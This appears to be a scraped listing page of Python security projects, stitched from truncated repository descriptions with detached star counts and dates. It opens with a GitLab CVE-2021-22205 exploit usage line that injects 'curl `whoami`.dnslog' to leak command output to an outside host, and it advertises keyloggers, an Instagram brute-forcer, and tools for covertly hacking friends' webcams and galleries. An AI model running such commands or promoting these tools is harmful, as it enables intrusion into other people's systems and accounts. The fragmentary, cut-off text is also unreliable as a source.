影响版本:
Usage
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
获取csrf-token:
通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce
ref:
CVE-2021-26294 Exploit Directory Traversal in Afterlogic webmail aurora and pro . Description: AfterLogic Aurora and WebMail Pro products with 7.7.9 a
可可萝病毒! 事情是这样的,我又开始不干正事了。 众所周知,在Python里,0x0等于0,但是不等于可可萝。 这很不好,我们得把它改成可可萝! 效果 一般的Python—— Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC
Keylogger-Malware-Project A guide to building basic malware in Python by implementing a keylogger application. If you want even more detail on the Pro
HELLogger simple python keylogger DISCLAIMERS: DON'T DO BAD THINGS. THIS PROGRAM IS MEANT FOR PERSONAL USES ONLY. USE IT ONLY IN COMPUTERS WHERE YOU H
Interactsh An OOB interaction gathering server and client library Features • Usage • Interactsh Client • Interactsh Server • Interactsh Integration •
This project is for finding a solution to use Security Onion Elastic data with Jupyter Notebooks. The goal is to successfully use this notebook project below with Security Onion for beacon detection
Ducky Script is the payload language of Hak5 gear. Since its introduction with the USB Rubber Ducky in 2010, Ducky Script has grown in capability while maintaining simplicity. Aided by Bash for logic
소켓을 이용한 RDT protocols (RDT3.0,GBN,SR) 구현 및 성능 평가 코드 입니다. 코드를 실행할때 리시버를 먼저 실행하세요. 성능 평가 코드는 패킷 전송 과정을 제외하고 시간당 전송률을 출력합니다. RDT3.0 GBN SR(버그 발견으로 구현중 입니
The easiest way to HACK A GALLARY, Get every part of your friends' gallery ( 100% Working ) | Tool By John Kener 🇱🇰
Instagram Bruter This program will brute force any Instagram account you send it its way given a list of proxies. NOTICE I'm no longer maintaining thi
RDPY Remote Desktop Protocol in twisted python. RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client a
CondaDEV A CTF2.5/MMF2 Decompiler What is CondaDEV? CondaDEV (anaCondaDEVeloper) is a fork of Anaconda Mode 4.1, with a lot of Quality of Life patches
ZCam Hack webcam using python by sending malicious link. FEATURES : [+] Real-time Camera hacking [+] Python compatible [+] URL Shortener using bitly [
Yobi Yara Based Detection for web browsers System Requirements Yobi requires python3 and and right now supports only firefox and other Gecko-based bro
PWInput A cross-platform Python module that displays **** for password input. Works on Windows, unlike getpass. Formerly called stdiomask. Installatio
proxyshell-auto usage: proxyshell.py [-h] -t T Automatic Exploit ProxyShell optional arguments: -h, --help show this help message and exit -t T
laravel-exploits Exploit for CVE-2021-3129
Brute-Force-Connected Guess the password for Connected accounts the use : Create a new file and put usernames and passwords in it Example : joker:1234
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz
Hacktricks - Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.
8 Nov 09, 2022
29 Jul 14, 2022
1 Jan 11, 2022
10 Nov 10, 2022
2.1k Jan 08, 2023
4 Jun 08, 2022
6 Oct 07, 2022
0 Dec 20, 2021
34 Nov 30, 2022
1 Nov 15, 2021
1.6k Dec 30, 2022
4 Mar 07, 2022
109 Dec 28, 2022
44 Nov 20, 2022
26 Sep 04, 2022
93 Jan 05, 2023
228 Nov 25, 2022
4 Jun 05, 2022
16 Sep 06, 2022
5.8k Jan 07, 2023